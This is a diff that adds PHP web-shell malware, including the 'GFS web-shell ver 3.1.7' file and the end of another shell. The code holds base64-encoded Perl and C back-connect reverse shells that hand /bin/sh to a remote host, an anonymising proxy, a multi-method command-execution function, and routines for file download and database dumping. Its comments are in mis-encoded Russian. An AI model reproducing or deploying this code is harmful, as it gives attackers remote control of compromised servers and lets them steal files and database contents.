+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîðåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïðåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêðûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>   ".$fil."   </b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "

php/GFS_web-shell_ver_3.1.7_-_PRiV8.php

@@ -0,0 +1,520 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ðåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèðîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
